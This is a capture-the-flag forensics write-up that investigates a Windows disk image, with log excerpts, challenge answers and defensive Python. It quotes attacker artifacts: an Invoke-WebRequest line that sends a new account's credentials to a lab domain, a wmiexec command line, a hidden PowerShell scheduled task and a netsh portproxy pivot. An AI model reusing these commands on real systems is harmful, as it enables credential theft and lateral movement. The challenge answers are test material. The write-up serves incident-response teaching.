Description

LeStrade passes disk image artifacts to Watson. It’s one of the identified breach points, now showing abnormal CPU activity and anomalies in process logs.

TL;DR

  • First attacker command:
    systeminfo (from Security.evtx Event ID 4688, first non‑cd, non‑alias command executed via cmd.exe)
  • Parent process spawning commands:
    C:\Windows\System32\wbem\WmiPrvSE.exe (from 4688 event creating cmd.exe -> parent process field)
  • Remote execution tool:
    wmiexec.py (from cmd.exe command line with \\127.0.0.1\ADMIN$ redirection, hallmark of Impacket’s wmiexec)
  • Attacker’s IP address:
    10.129.242.110 (from Security.evtx Event ID 4624 network logon, IpAddress field)
  • First persistence element:
    SysHelper Update (from malicious Scheduled Task XML in C:\Windows\System32\Tasks\SysHelper Update)
  • Persistence script executed: C:\Users\Werni\AppData\Local\JM.ps1
    (from scheduled task definition, PowerShell arguments)
  • Local account created:
    svc_netupd (from Security.evtx Event ID 4720, account creation)
  • Credential exfiltration domain:
    NapoleonsBlackPearl.htb (from Invoke-WebRequest in JM.ps1)
  • Generated password:
    Watson_20250824160509 (JM.ps1 pattern + timezone bias (UTC‑7) + Event 4720 time)
  • Internal pivot IP:
    192.168.1.101 (from netsh portproxy command line parameters)
  • Forwarded TCP port:
    9999 (listenport in netsh command line)
  • Registry path for portproxy rules:
    HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp (from Windows portproxy persistence location)
  • MITRE ATT&CK ID (pivot technique):
    T1090.001 (Proxy: Internal Proxy – adversary using built-in portproxy for lateral pivoting)
  • Admin command enabling command line logging:
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit" /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f (from Administrator’s ConsoleHost_history.txt)

Solution

For this challenge, we get a Windows disk to examine.

What was the first (non cd) command executed by the attacker on the host? (string)

Parsing the Security logs (C:\Windows\System32\winevt\Logs\Security.evtx) using python3 evtx_dump.py /mnt/win/Windows/System32/winevt/Logs/Security.evtx, we can search the output for process creation events (4688). The first entry we find with cmd.exe as the parent is the following:

<EventID>4688</EventID>
<TimeCreated SystemTime="2025-08-24T22:51:09Z"/>
<NewProcessName>C:\Windows\System32\systeminfo.exe</NewProcessName>
<CommandLine>systeminfo</CommandLine>
<ParentProcessName>C:\Windows\System32\cmd.exe</ParentProcessName>

This shows the first attacker command was systeminfo executed via cmd.exe.

Answer: systeminfo

Which parent process (full path) spawned the attacker’s commands? (C:\FOLDER\PATH\FILE.ext)

Looking for the process creation events for cmd.exe, we find this entry:

<NewProcessName>C:\Windows\System32\cmd.exe</NewProcessName>
<CommandLine>cmd.exe /Q /c systeminfo 1&gt; \\127.0.0.1\ADMIN$\__1756075857.955773 2&gt;&amp;1</CommandLine>
<ParentProcessName>C:\Windows\System32\wbem\WmiPrvSE.exe</ParentProcessName>

Here we find the ParentProcessName.

Answer: C:\Windows\System32\wbem\WmiPrvSE.exe

Which remote-execution tool was most likely used for the attack? (filename.ext)

The command line cmd.exe /Q /c systeminfo 1> \\127.0.0.1\ADMIN$\__1756075857.955773 2>&1 (output redirected to a __<unix timestamp> file on the ADMIN$ share of the loopback address, spawned by WmiPrvSE.exe) indicates the use of Impacket’s wmiexec.py tool, as described in the blog post Defense Against the Lateral Arts: Detecting and Preventing Impacket’s Wmiexec.

Answer: wmiexec.py
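To make this hallmark a repeatable check rather than a one-off grep, the following is an added example (not part of the original writeup): it scans evtx_dump-style XML for 4688 records in which WmiPrvSE.exe spawns cmd.exe /Q /c with output redirected to \\127.0.0.1\ADMIN$\__<timestamp>, and recovers the operator-typed command from each. It assumes python-evtx's <Data Name="..."> layout and uses constructed sample records modelled on the ones quoted above.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample records in the layout python-evtx's evtx_dump.py emits (one <Event> per
# record); the values are modelled on the records quoted in the writeup.
SAMPLE_XML = r"""<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><EventID>4688</EventID>
 <TimeCreated SystemTime="2025-08-24 22:50:40"/></System><EventData>
 <Data Name="NewProcessName">C:\Windows\System32\notepad.exe</Data><Data Name="CommandLine">notepad.exe</Data>
 <Data Name="ParentProcessName">C:\Windows\explorer.exe</Data></EventData></Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><EventID>4688</EventID>
 <TimeCreated SystemTime="2025-08-24 22:50:57"/></System><EventData>
 <Data Name="NewProcessName">C:\Windows\System32\cmd.exe</Data><Data Name="ParentProcessName">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
 <Data Name="CommandLine">cmd.exe /Q /c cd 1&gt; \\127.0.0.1\ADMIN$\__1756075857.123456 2&gt;&amp;1</Data></EventData></Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><EventID>4688</EventID>
 <TimeCreated SystemTime="2025-08-24 22:51:09"/></System><EventData>
 <Data Name="NewProcessName">C:\Windows\System32\cmd.exe</Data><Data Name="ParentProcessName">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
 <Data Name="CommandLine">cmd.exe /Q /c systeminfo 1&gt; \\127.0.0.1\ADMIN$\__1756075857.955773 2&gt;&amp;1</Data></EventData></Event>
</Events>"""

# wmiexec's hallmark: output redirected to a __<unix time> file on the ADMIN$ share of the loopback address.
ADMIN_SHARE_REDIR = re.compile(r"1>\s*\\\\127\.0\.0\.1\\ADMIN\$\\__\d+\.\d+\s+2>&1", re.I)
CMD_PREFIX = "cmd.exe /q /c "

def is_wmiexec_like(command_line, parent):
    r"""WmiPrvSE.exe spawning 'cmd.exe /Q /c <cmd> 1> \\127.0.0.1\ADMIN$\__<ts> 2>&1'."""
    return (parent.lower().endswith(r"\wbem\wmiprvse.exe")
            and command_line.lower().startswith(CMD_PREFIX)
            and ADMIN_SHARE_REDIR.search(command_line) is not None)

def wmiexec_commands(xml_text):
    """(SystemTime, operator command) for every wmiexec-like 4688 record, in log order."""
    found = []
    for ev in ET.fromstring(xml_text).findall(".//{*}Event"):
        if ev.findtext(".//{*}EventID") != "4688":
            continue
        data = {d.get("Name"): (d.text or "") for d in ev.findall(".//{*}Data")}
        cmdline, parent = data.get("CommandLine", ""), data.get("ParentProcessName", "")
        if is_wmiexec_like(cmdline, parent):
            inner = ADMIN_SHARE_REDIR.sub("", cmdline[len(CMD_PREFIX):]).strip()
            found.append((ev.find(".//{*}TimeCreated").get("SystemTime"), inner))
    return found

def first_non_cd_command(xml_text):
    """First attacker command, skipping the bare 'cd' the challenge question excludes."""
    return next((cmd for _t, cmd in wmiexec_commands(xml_text) if cmd.lower() != "cd"), None)
```

Run it against the full evtx_dump output instead of SAMPLE_XML to list every command the operator executed through wmiexec, in order.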

What was the attacker’s IP address? (IPv4 address)

To find the IP address, we can search the parsed Security logs for Successful logon events (4624). One of those events with the LogonType 3 (network logon) is the following:

<Data Name="IpAddress">10.129.242.110</Data>
<Data Name="LogonType">3</Data>

In the IpAddress property, we find the attacker’s IP address.

Answer: 10.129.242.110

What is the first element in the attacker’s sequence of persistence mechanisms? (string)

In the Windows\System32\Tasks\ directory we can find SysHelper Update.
This task was configured to execute a hidden PowerShell process calling JM.ps1.

<URI>\SysHelper Update</URI>
<Exec>
  <Command>powershell</Command>
  <Arguments>-ExecutionPolicy Bypass -File C:\Users\Werni\AppData\Local\JM.ps1</Arguments>
</Exec>

So the first element is the task name.

Answer: SysHelper Update

Identify the script executed by the persistence mechanism. (C:\FOLDER\PATH\FILE.ext)

From the task configuration, we can find the path of the JM.ps1 script.

Answer: C:\Users\Werni\AppData\Local\JM.ps1

What local account did the attacker create? (string)

In the Security logs, we can search for Account Creation events (4720). Here we find the following entry:

<EventID>4720</EventID>
<TargetUserName>svc_netupd</TargetUserName>
<TimeCreated SystemTime="2025-08-24T23:05:09Z"/>

The TargetUserName field shows the newly created account: svc_netupd.

Answer: svc_netupd

What domain name did the attacker use for credential exfiltration? (domain)

In the malicious PowerShell script, we find the domain the attacker used.

Invoke-WebRequest -Uri "http://NapoleonsBlackPearl.htb/Exchange?data=$([Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes("$newUser|$password")))" -UseBasicParsing -ErrorAction SilentlyContinue | Out-Null

Answer: NapoleonsBlackPearl.htb

What password did the attacker’s script generate for the newly created user? (string)

The password generation in the script looks like this:

$timestamp = (Get-Date).ToString("yyyyMMddHHmmss")
$password  = "Watson_$timestamp"

This means the password was generated from a timestamp taken at the moment the script ran. The creation time of the svc_netupd account (the 4720 event above) gives us that timestamp.

<TimeCreated SystemTime="2025-08-24T23:05:09.764658Z">

Since Get-Date uses local system time, we have to find the timezone configured on the system. To do this, we can open the SYSTEM hive and check the TimeZoneInformation key. The following Python script (using python-registry) extracts the timezone values.

from Registry import Registry  # python-registry

# Offline SYSTEM hive from the mounted image (path as used in this writeup)
reg = Registry.Registry("The_Enduring_Echo/C/Windows/System32/config/SYSTEM")
# ControlSet001 is assumed to be the active control set; Select\Current confirms which one is
tz_key = reg.open("ControlSet001\\Control\\TimeZoneInformation")
for v in tz_key.values():
    # Prints StandardName/TimeZoneKeyName plus the Bias values (minutes, stored as DWORDs)
    print(v.name(), v.value())

This returns Pacific Standard Time. In late August daylight saving time is in effect for that zone, so the local offset is UTC‑7 rather than UTC‑8: to convert the TimeCreated timestamp we subtract 7 hours, giving 2025‑08‑24 16:05:09. Formatting this according to the script’s pattern gives the generated password.

Answer: Watson_20250824160509
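The conversion above carried out in code, as an added example that is not part of the original writeup: it takes the TimeZoneInformation values as python-registry would return them (constructed here, assuming ActiveTimeBias is 420, i.e. UTC‑7 with daylight time in effect, which matches the 7-hour subtraction), applies them to the 4720 SystemTime and rebuilds the password. It also lists the neighbouring seconds as candidates, since Get-Date ran slightly before the account-creation event was logged.

```python
from datetime import datetime, timedelta, timezone

# Constructed TimeZoneInformation values as python-registry's v.name()/v.value() would return
# them (assumed for this example; DWORDs come back unsigned, so DaylightBias -60 is 0xFFFFFFC4).
SAMPLE_TZ_VALUES = {
    "Bias": 480, "StandardBias": 0, "DaylightBias": 0xFFFFFFC4, "ActiveTimeBias": 420,
    "StandardName": "Pacific Standard Time", "DaylightName": "Pacific Daylight Time",
    "TimeZoneKeyName": "Pacific Standard Time",
}

def signed_dword(v):
    """Registry DWORDs are unsigned; reinterpret values >= 2**31 as negative."""
    return v - 2**32 if v >= 2**31 else v

def utc_offset_from_hive(tz_values):
    """Windows stores a bias as minutes to ADD to local time to reach UTC, so the UTC offset is
    its negation. ActiveTimeBias is the bias in effect when the hive was last written (DST folded in)."""
    return timedelta(minutes=-signed_dword(tz_values["ActiveTimeBias"]))

def local_time_at(system_time_utc, tz_values):
    """evtx TimeCreated SystemTime (UTC) -> what Get-Date returned on the host at that instant."""
    utc = datetime.fromisoformat(system_time_utc.replace("Z", "+00:00"))
    return utc.astimezone(timezone(utc_offset_from_hive(tz_values)))

def script_password(system_time_utc, tz_values):
    """Re-create $password = "Watson_$timestamp" with (Get-Date).ToString("yyyyMMddHHmmss")."""
    return "Watson_" + local_time_at(system_time_utc, tz_values).strftime("%Y%m%d%H%M%S")

def candidate_passwords(system_time_utc, tz_values, slack_seconds=2):
    """Get-Date ran just before the 4720 event was logged; enumerate the preceding seconds too."""
    base = local_time_at(system_time_utc, tz_values)
    return ["Watson_" + (base - timedelta(seconds=s)).strftime("%Y%m%d%H%M%S")
            for s in range(slack_seconds + 1)]

if __name__ == "__main__":
    print(script_password("2025-08-24T23:05:09.764658Z", SAMPLE_TZ_VALUES))
```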

What was the IP address of the internal system the attacker pivoted to? (IPv4 address)

In the Security logs, we can find a netsh process setting up a port proxy.

netsh interface portproxy add v4tov4 listenport=9999 connectaddress=192.168.1.101 connectport=22

The connectaddress parameter contains the IP address we’re looking for.

Answer: 192.168.1.101

Which TCP port on the victim was forwarded to enable the pivot? (port 0-65565)

In the previous log entry, we can find the port in the listenport parameter.

Answer: 9999

What is the full registry path that stores persistent IPv4→IPv4 TCP listener-to-target mappings? (HKLM……)

In the blog post Pivoting: Setting up a port proxy with netsh on Windows, we find the full registry path.

Answer: HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp

What is the MITRE ATT&CK ID associated with the previous technique used by the attacker to pivot to the internal system? (Txxxx.xxx)

Searching MITRE ATT&CK for the portproxy pivoting technique, we find the ID.

Answer: T1090.001

Before the attack, the administrator configured Windows to capture command line details in the event logs. What command did they run to achieve this? (command)

In the ConsoleHost_history.txt file at /The_Enduring_Echo/C/Users/Administrator/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadline/ConsoleHost_history.txt, we find an entry enabling the inclusion of command line details in process creation (4688) events.

Answer: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit" /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f